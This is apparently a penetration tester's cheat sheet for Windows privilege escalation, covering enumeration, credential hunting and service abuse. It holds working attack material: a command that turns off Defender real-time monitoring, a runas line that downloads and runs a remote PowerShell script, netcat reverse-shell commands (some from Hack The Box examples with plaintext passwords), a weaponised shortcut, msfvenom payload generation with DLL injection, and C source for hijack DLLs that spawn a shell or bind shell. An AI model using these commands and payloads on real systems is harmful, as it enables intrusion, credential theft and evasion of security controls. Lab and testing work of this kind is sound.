Windows Snippets


Small collection of Windows privilege escalation scripts, references, binaries and commands.

Scripts

HostRecon.ps1
Sherlock.ps1
JAWS
windows-privesc-check
Windows-Exploit-Suggester

References

LOLBAS
PowerTools
nishang
RamblingCookieMonster

General

Users


whoami /all
wmic computersystem get username
net users
net user <username>

Get-LocalUser
Get-LocalUser -Name <username>


Groups


net localgroup
net localgroup <groupname>

Get-LocalGroup
Get-LocalGroup -Name <groupname>


System


systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"Domain" 


Drives


fsutil fsinfo drives
wmic logicaldisk get name
Get-PSDrive


Files


dir | findstr "<keyword>"  //grep for keyword
Get-ChildItem C:\users\targetuser -Filter *.txt -Recurse | % { $_.FullName }  // recursive dir for specific file type
Get-ChildItem -Path C:\users\chase\ -Recurse -File | Select-String <keyword>  //recursive dir grep for keyword
ls -r c:\ -file | % {select-string -path $_ -pattern mypassword}

dir /a-r-d /s /b    //writable directories
dir /s *keyword*    //search for keyword
dir c:\*.* /S /Q|FIND /i "owner"  //search for files by owner
dir /s /R /a        //search ADS


Processes


tasklist /v
tasklist /svc

wmic process list full 

Get-Process -Id <> | Select-Object * 

Get-CimInstance Win32_Process -Filter "name = 'example.exe'"
$proc = Get-CimInstance Win32_Process -Filter "name = 'example.exe'"
Invoke-CimMethod -InputObject $proc -MethodName GetOwner

procdump.exe -accepteula -ma <pid>


Firewall config


netsh firewall show state
netsh firewall show config 
netsh advfirewall firewall show rule name=all

Get-NetFirewallRule | Where { $_.Enabled -eq 'True' -and $_.Direction -eq 'Inbound' }
Get-NetFirewallRule | Where { $_.Enabled -eq 'True' -and $_.Direction -eq 'Outbound' }


Registry


reg query HKLM /s | findstr /i <item>
reg query HKCU /s | findstr /i <item>
reg query HKLM /f <item> /t REG_SZ /s
reg query HKCU /f <item> /t REG_SZ /s
	
reg query HKLM\SYSTEM\CurrentControlSet\Services\


wmic


wmic nicconfig get ipaddress,macaddress	                 //get ip and mac			

wmic computersystem get username	                 //verify account				   

wmic netlogin get name, lastlogon		         //who used sys last, last logged on				    

wmic desktop get screensaversecure, screensavertimeout	 //screen saver pass protected? get timeout	

wmic logon get authenticationpackage			 //which logon methods supported

wmic process get caption, executablepath, commandline	 //identify system processes

wmic process where name="process_name" call terminate    //terminates specific process
				
wmic os get name, servicepackmajorversion 		 //determine sys os

wmic product get name, version		                //identify installed software

wmic product where name="name" call uninstall /noninteractive   //uninstalls/removes the named software package

wmic share get /ALL		                        //identify shares accessible to user							                               

wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"	//start rdp

wmic nteventlog get path, filename,writable            //find all sys event logs and checks if writable


Disable Windows Defender


powershell.exe -exec bypass -command Set-MpPreference -DisableRealtimeMonitoring $true
//requires local admin; the change is rejected while Tamper Protection is enabled


Services


sc query             //list services and perms
sc qc <service-name> // check perms, dependencies, config, changes etc.
  
sc Qdescription <service-name>  //get description of service
  
sc sdShow <service-name>  //get Service Descriptor Definition Language string for service
  ConvertFrom-SddlString -Sddl "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCLCSWRPWPDTLORC;;;S-1-5-21-2115913093-551423064-1540603852-1003)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLORC;;;BU)(A;;CCLCSWRPWPLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"  
// ^ Will give us owner, group, DACL, SACL and RawDescriptor

sc config <service-name> binpath="C:\programdata\rootshell.exe"
  
sc stop <service-name>
sc start <service-name>    


Get-ServiceUnquoted -Verbose       //PowerUp.ps1
  Write-ServiceBinary -Name ' ' -Path <hijack-path>

Get-ModifiableServiceFile -Verbose //PowerUp.ps1
  Install-ServiceBinary -Name ' '

Get-ModifiableService -Verbose     //PowerUp.ps1
  Invoke-ServiceAbuse -Name ' '

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """


Credentials


cmdkey /list

Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials

Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"

C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
...web.config

dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s 

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

Get-CachedGPPPassword 
Get-GPPPassword       
Get-UnattendedInstallFile
Get-Webconfig
Get-ApplicationHost
Get-SiteListPassword
Get-CachedGPPPassword
Get-RegistryAutoLogon

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
post/windows/gather/credentials/gpp


Runas / PowerShell


runas /user:administrator /savecred "cmd.exe /k whoami"
runas /profile /savecred /user:administrator "rootshell.exe"
runas /user:administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://<lhost>/shell.ps1')"

Option explicit
dim oShell
set oShell= Wscript.CreateObject("WScript.Shell")
oShell.Run "runas /user:admin ""c:\windows\system32\cmd.exe"""
WScript.Sleep 100
oShell.Sendkeys "password~"
Wscript.Quit	

powershell -exec bypass -c "$Username = 'domain\user'; $Password = ''; $pass = ConvertTo-SecureString -AsPlainText $Password -Force; $Cred = New-Object  System.Management.Automation.PSCredential -ArgumentList $Username,$pass; Invoke-Command -Credential $Cred -ComputerName localhost { whoami }" 

echo $username = ' '
echo $password = ' ' 
echo $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securepassword 
echo Start-Process 'C:\Users\username\nc.exe' -ArgumentList '-e cmd.exe <ip> <port>' -Credential $credential

// HTB examples
$Username = 'arkham\\batman' 
$Password = 'Zx^#QZX+T!123'; 
$pass = ConvertTo-SecureString -AsPlainText $Password -Force 
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass 
Invoke-Command -Credential $Cred -ComputerName localhost { C:\tomcat\apache-tomcat-8.5.37\bin\nc64.exe 10.10.x.x 443 -e cmd.exe }
powershell -exec bypass .\s.ps1

$user = 'HELPLINE\tolu'
$password = '!zaq1234567890pl!99'
$computer = 'HELPLINE'
$pass = ConvertTo-SecureString -String $password -AsPlainText -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList ($user,$pass)
$session = New-PSSession -ComputerName $computer -Credential $cred -Authentication CredSSP
Invoke-Command -Session $session -ScriptBlock {whoami}
helpline\tolu

$pass = ConvertTo-SecureString 'password' -AsPlainText -Force
$cred = new-object System.Management.Automation.PSCredential('user', $pass)
$session = New-PSSession -ComputerName <rhost> -Credential $cred -Authentication Negotiate
Enter-PSSession $session



$WScript = New-Object -COM WScript.shell
$SC = $WScript.CreateShortcut('not_a_reverse_shell.lnk')
$SC.TargetPath="C:\Windows\System32\cmd.exe"
$SC.Arguments="/c cmd C:\programdata\rootshell.exe"
$SC   //check everything's in order            
$SC.Save()
//We can also take an un-malicious link and turn it into one..
Right click a link -> properties:
Target: C:\Windows\System32\cmd.exe /c C:\programdata\rootshell.exe
Start in: C:\Windows\System32
Ok


Finally there’s a tool called LNKUp that we can also use:

python generate.py --host localhost --type ntlm --output payload.lnk --execute 'C:\programdata\rootshell.exe'


DLLs


Windows Data Types

msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 -f dll > shell.dll
//Check for SYSTEM processes beforehand
Invoke-DLLInjection -ProcessID <pid> -Dll C:\programdata\shell.dll
#include <windows.h>

/*
 * DllMain - entry point the loader calls whenever this DLL is mapped into a
 * process.  The reason code is never inspected, so the WinExec below runs on
 * every invocation (process attach/detach and, unless the host disabled thread
 * callbacks, each thread attach/detach) - the payload may therefore fire more
 * than once per process.
 *
 *   hInst              - module handle of this DLL (unused)
 *   ul_reason_for_call - DLL_PROCESS_ATTACH / DLL_THREAD_ATTACH / ... (unused)
 *   lpReserved         - loader-supplied context (unused)
 *
 * Returns TRUE unconditionally, so the load is never refused.
 *
 * Defender's view: a freshly loaded DLL whose DllMain spawns a child process is
 * the characteristic shape of DLL hijacking / injection payloads; an image-load
 * event immediately followed by an unexpected child of the host process is the
 * signal to alert on.
 */
BOOL WINAPI DllMain( HINSTANCE hInst,
                     DWORD  ul_reason_for_call,
                     LPVOID lpReserved
                   )
{
    /* uCmdShow 0 (SW_HIDE): the launched process gets no visible window.
       WinExec's return value is discarded, so a failed launch is silent. */
    WinExec("C:\\programdata\\shell.exe", 0);
    return TRUE;
}
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

/*
 * bind - launches netcat as a bind shell: -l listen, -v verbose, -p 443 port,
 * -e cmd.exe attached to whatever connects.  uCmdShow 0 (SW_HIDE) hides the
 * window.  WinExec's result is ignored and 0 is always returned, so a missing
 * nc.exe or a port already in use goes unnoticed by the caller.
 *
 * Detection note: nc.exe appearing as a child of a process that just loaded a
 * DLL, together with a new listening socket on 443, is a high-signal indicator.
 *
 * NOTE(review): windows.h normally pulls in winsock.h, which also declares a
 * function named bind(); whether this definition collides depends on the
 * build flags - confirm if the build complains about conflicting declarations.
 */
int bind()
{
	WinExec("c:\\programdata\\nc.exe -lvp 443 -e cmd.exe", 0);
	return 0;
}

/*
 * DllMain - entry point the loader calls when this DLL is mapped/unmapped.
 * Unlike the first variant above, it dispatches on the reason code so bind()
 * runs only once per process (DLL_PROCESS_ATTACH); thread attach/detach and
 * process detach are no-ops.
 *
 *   hModule            - module handle of this DLL (unused)
 *   ul_reason_for_call - why the loader invoked us
 *   lpReserved         - loader-supplied context (unused)
 *
 * Returns TRUE unconditionally, so the load is never refused.
 *
 * NOTE(review): spawning a process from DllMain happens while the loader lock
 * is held, which Microsoft documents as unsafe; it works in practice for this
 * snippet but can deadlock the host.
 */
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
		bind();
        /* intentional fall-through: the remaining cases only break */
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}